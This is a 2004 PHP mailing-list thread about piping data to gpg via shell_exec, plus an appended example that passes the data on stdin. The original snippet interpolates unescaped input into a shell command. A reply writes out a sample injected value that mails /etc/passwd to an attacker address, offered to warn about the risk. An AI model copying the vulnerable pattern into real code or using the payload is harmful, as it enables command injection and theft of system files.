[nycphp-talk] Digital Signatures in PHP
drydell at att.net
Fri Jun 4 11:08:19 EDT 2004
Yes, there would be that danger... in my case, $data is always system generated...
-------------- Original message from Rolan Yang : --------------
> That is great news! Hey, is there any danger in doing echo's of $data
> with shell_exec?
> I'm wondering, if someone injected $data with something like say..
> "This is is the message I want encrypted.'; /bin/cat /etc/passwd |
> /bin/mail evilhaxor at hotmail.com; echo 'misc info"
> would that all get encrypted entirely or would it run the shell code
> sandwiched in the middle?
>
> ~Rolan
>
> David Rydell wrote:
>
> >>>Yea, sometimes I wish you could just pipe data to gpg and have it spit...
> >
> >You can pipe data to gpg directly... this snippet is from my email class,
> >which does exactly that:
> >
> >$enc = chunk_split(base64_encode(shell_exec("echo '$data' |
> >/usr/bin/gpg --homedir /user/.gnupg --compress-algo 1 --cipher-algo
> >3des -e -r $recipient 2>> /user/cgi-logs/gpg.log")));
> >
> >(note the compression/cipher is completely compatible with pgp)
> >
> >I got the technique from browsing their website http://www.gnupg.org/
> >
> >
> >_______________________________________________
> >talk mailing list
> >talk at lists.nyphp.org
> >http://lists.nyphp.org/mailman/listinfo/talk
> >
> >
> >
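The injection risk raised in this thread comes from interpolating $data into a shell command line. As an added example (not code from either poster), the same gpg call can be made with no shell at all by handing the message to gpg on stdin. It assumes PHP 7.4 or later for the array form of proc_open; the function name gpg_encrypt and the --batch flag are additions here, and the paths and cipher options are the ones from the quoted snippet.

```php
<?php
declare(strict_types=1);

/**
 * Encrypt $data for $recipient by writing it to gpg's stdin.
 * The command is an argv array, so no shell ever parses $data or $recipient:
 * quotes, semicolons and pipes in the message are just bytes to be encrypted.
 * (On PHP older than 7.4, build a string command and wrap every variable in
 * escapeshellarg() instead; the data should still go through stdin.)
 */
function gpg_encrypt(string $data, string $recipient, string $gpg = '/usr/bin/gpg'): string
{
    $argv = [
        $gpg, '--homedir', '/user/.gnupg', '--batch',
        '--compress-algo', '1', '--cipher-algo', '3des',
        '-e', '-r', $recipient,          // $recipient is one argv element, never re-split
    ];

    // Ciphertext goes to a temp file rather than a pipe, so writing a large
    // message to stdin cannot deadlock against a full stdout pipe.
    $out = tmpfile();
    if ($out === false) {
        throw new RuntimeException('could not create temp file');
    }
    $spec = [
        0 => ['pipe', 'r'],                            // gpg stdin: plaintext
        1 => $out,                                     // gpg stdout: ciphertext
        2 => ['file', '/user/cgi-logs/gpg.log', 'a'],  // same log as the original 2>>
    ];

    $proc = proc_open($argv, $spec, $pipes);
    if (!is_resource($proc)) {
        throw new RuntimeException('could not start gpg');
    }
    fwrite($pipes[0], $data);
    fclose($pipes[0]);                                 // EOF tells gpg the message is complete

    $status = proc_close($proc);                       // waits for gpg to exit
    if ($status !== 0) {
        throw new RuntimeException("gpg exited with status $status, see gpg.log");
    }

    rewind($out);
    $cipher = stream_get_contents($out);
    fclose($out);
    return chunk_split(base64_encode($cipher));
}

// Constructed sample input containing shell metacharacters; it is encrypted verbatim.
// $enc = gpg_encrypt("it's a test'; echo injected; echo '", 'someone@example.org');
```

Checking the exit status also means a failed encryption raises an error instead of silently producing an empty base64 body.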